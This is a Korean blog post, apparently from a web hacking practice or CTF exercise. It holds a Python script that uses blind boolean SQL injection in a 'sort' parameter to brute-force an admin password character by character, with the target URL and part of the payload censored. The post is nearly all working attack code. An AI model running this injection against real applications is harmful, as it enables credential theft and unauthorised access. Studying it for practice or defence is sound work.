sqli practice
2020. 7. 14. 16:52ㆍ0x0B Web Hacking
728x90
출처는 공개하지 마라고 해서 페이로드 일부분은 마스킹 되어있음.
import requests
import urllib3
import sys
import string # ascii_letters
urllib3.disable_warnings()
url = "##CENSORED##"
cookie = {'PHPSESSID': '##CENSORED##'}
brute = string.digits
brute += string.ascii_lowercase
'''
print(f"[+] Brute => {brute}")
tmp=[]
for ch in brute:
params = {'sort':f",(select 1 from tb_lv10 where (select count(1) from tb_lv10 where id='admin' and pw LIKE '%{ch}%')!=1)",
}
res = requests.get(url,params=params,cookies=cookie)
if(res.text.count("admin")==5):
#print(f"{ch}")
tmp.append(ch)
print(f"This is admin password list {tmp}")
'''
# Query [Get Admin Password Length]
# ,(select%201%20from%20tb_lv10%20where%20(select%20count(*)%20from%20tb_lv10%20where%20id=%27admin%27%20and%20length(pw)=7)!=1)
# substr(pw,0,1)='g'
flag = [##CENSORED##]
print(flag)
index = 1
len = 7
while(index < int(len)+1): #
for ch in flag:
params = {'sort':f",(select 1 from table_1 where (select count(1) from table_1 where id='admin' and substr(pw,{index},1)='{ch}')!=1)",
}
res = requests.get(url,params=params,cookies=cookie)
if(res.text.count("admin")==5):
print(f"{ch}")
index+=1'0x0B Web Hacking' 카테고리의 다른 글
| HTB - Freelancer (0) | 2021.02.12 |
|---|---|
| 크롤링 2020 트능(트렌드 능력고사) (0) | 2020.07.14 |
| Hackerone CMS V2 Flag02 (0) | 2020.06.29 |
| HackerFactory 10번문제 (0) | 2020.01.25 |
| Hacker Factory 7번문제 (0) | 2020.01.25 |